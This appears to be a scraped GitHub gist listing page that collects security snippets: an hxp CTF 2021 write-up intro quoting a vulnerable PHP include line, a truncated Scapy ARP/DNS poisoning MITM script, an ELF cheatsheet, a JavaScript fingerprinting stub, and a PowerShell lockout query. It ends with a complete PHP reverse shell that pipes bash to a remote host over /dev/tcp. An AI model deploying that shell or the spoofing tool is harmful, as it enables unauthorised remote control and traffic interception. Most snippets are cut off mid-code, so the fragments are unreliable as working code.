@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the PHP installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@davidlares
davidlares / arp.py
Last active July 22, 2024 09:24
MITM ARP/DNS Spoof with Scapy
#!/usr/bin/python
from scapy.all import *
import threading
import argparse
import pdb
import sys
import os
class ARPPoisoning(threading.Thread):
@x0nu11byt3
x0nu11byt3 / elf_format_cheatsheet.md
Created February 27, 2021 05:26
ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF) is the default binary format on Linux-based systems.

ELF

Compilation

@nikitastupin
nikitastupin / fingerprint.js
Created February 8, 2021 12:21
fingerprint.js
(() => {
  let gadgets = [];
  if (typeof _satellite !== 'undefined') {
    gadgets.push('Adobe Dynamic Tag Management');
  }
  if (typeof BOOMR !== 'undefined') {
    gadgets.push('Akamai Boomerang');
  }
@adgooroo
adgooroo / gist:aae14456ba53abff8b4c3f45cdb01e80
Last active April 6, 2023 21:17
DNSBL list 2023
@richarddun
richarddun / gist:1bb11d32cafc394efbcb8f4a8b6cb130
Last active January 30, 2025 19:33
scapy script to send http requests
#!/usr/bin/env python
"""
Script to open TCP connection and send 1 HTTP GET request containing
a specific string, and header
Usage:
./http.py <IP_of_target>
There is only one mandatory argument, which is the target IP address.
@MyITGuy
MyITGuy / acct_lockout_with_time.ps1
Created November 15, 2014 20:43
PowerShell: Locked Out Accounts with Lockout Time
Search-ADAccount -LockedOut | Get-ADUser -Properties lockoutTime | Select @{Name="sAMAccountName";Expression={$_.sAMAccountName.ToUpper()}},@{Name="LockoutTime";Expression={([datetime]::FromFileTime($_.lockoutTime).ToLocalTime())}} | Sort LockoutTime -Descending
@rshipp
rshipp / shell.php
Created July 17, 2014 15:06
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");